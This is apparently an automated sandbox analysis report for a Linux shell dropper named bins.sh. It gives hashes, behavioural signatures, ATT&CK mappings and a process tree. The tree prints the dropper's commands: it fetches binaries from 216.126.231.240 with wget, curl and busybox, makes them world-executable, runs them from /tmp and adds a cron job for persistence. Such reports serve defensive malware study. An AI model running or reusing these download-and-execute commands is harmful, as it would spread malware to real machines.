Analysis
- max time kernel: 149s
- max time network: 179s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 09-11-2024 15:42
Static task
- static1
Behavioral tasks
- behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240729-en
- behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
- behavioral3: sample bins.sh, resource debian9-mipsbe-20240418-en
- behavioral4: sample bins.sh, resource debian9-mipsel-20240729-en
General
- Target: bins.sh
- Size: 10KB
- MD5: aea24efa7797a187bea2466ccf0a14f6
- SHA1: c8d1d5d93b70c8de6098941ba438058be2d26403
- SHA256: 9b07515ab2261e313dfe889834a1d3e657eac7132cc863d56050ecdd9a36e25e
- SHA512: b4e53ccc6bb5387f2a0cf1429e8e6ca8703f0f437c82026ddabe93d4537b70b2ee338a087dfc83f18b534a471029a4396a57955b45ce9f95f4e7139d7dcc7868
- SSDEEP: 192:v/E/Q/Iz/zUoVb57XGSC7jd9lpX/IoJJBF/E/Q/Iz/z1balpX/IoLGSC7jG:vM4kwon7XGSC7jd9lpvIoJNM4k8lpvIm
Malware Config
Signatures
- Contacts a large (2188) amount of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTP, 3 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (PID, process): 696 chmod; 732 chmod; 769 chmod
- Executes dropped EXE (3 IoCs)
  Processes (PID, process): 697 /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW; 733 /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci; 770 /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
- Renames itself (1 IoC)
  Processes (PID, process): 771 lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
- Creates/modifies Cron job (1 TTP, 1 IoC)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes (description, IoC, process): File opened for modification /var/spool/cron/crontabs/tmp.yfyb4c by crontab
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Checks CPU configuration (1 TTP, 3 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  Processes (description, IoC, process): File opened for reading /proc/cpuinfo by curl (3 occurrences, each by curl)
- Writes file to tmp directory (9 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, IoC, process):
  File opened for modification /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci by wget
  File opened for modification /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 by wget
  File opened for modification /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 by curl
  File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW by curl
  File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW by busybox
  File opened for modification /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci by curl
  File opened for modification /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci by busybox
  File opened for modification /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 by busybox
  File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW by wget
Processes (path: command line, PID, triggered signatures; indentation shows parent/child depth)
- /tmp/bins.sh: /tmp/bins.sh (PID 646)
  - /bin/rm: /bin/rm bins.sh (PID 648)
  - /usr/bin/wget: wget http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 654) [Writes file to tmp directory]
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 675) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 682) [Writes file to tmp directory]
  - /bin/chmod: chmod 777 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 696) [File and Directory Permissions Modification]
  - /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW: ./PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 697) [Executes dropped EXE]
  - /bin/rm: rm PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 699)
  - /usr/bin/wget: wget http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci (PID 701) [Writes file to tmp directory]
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci (PID 721) [Checks CPU configuration; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci (PID 731) [Writes file to tmp directory]
  - /bin/chmod: chmod 777 RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci (PID 732) [File and Directory Permissions Modification]
  - /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci: ./RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci (PID 733) [Executes dropped EXE]
  - /bin/rm: rm RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci (PID 735)
  - /usr/bin/wget: wget http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 (PID 736) [Writes file to tmp directory]
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 (PID 749) [Checks CPU configuration; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 (PID 762) [Writes file to tmp directory]
  - /bin/chmod: chmod 777 lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 (PID 769) [File and Directory Permissions Modification]
  - /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5: ./lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 (PID 770) [Executes dropped EXE; Renames itself; Reads runtime system information]
    - /bin/sh: sh -c "crontab -l" (PID 772)
      - /usr/bin/crontab: crontab -l (PID 773)
    - /bin/sh: sh -c "crontab -" (PID 774)
      - /usr/bin/crontab: crontab - (PID 775) [Creates/modifies Cron job; Reads runtime system information]
  - /bin/rm: rm lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 (PID 777)
  - /usr/bin/wget: wget http://216.126.231.240/bins/2BkcRt9likIjRh8QY2MQF6uprmyKtaXkDW (PID 780)
Network
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1)
    - Linux and Mac File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1)
    - System Checks (1)
Downloads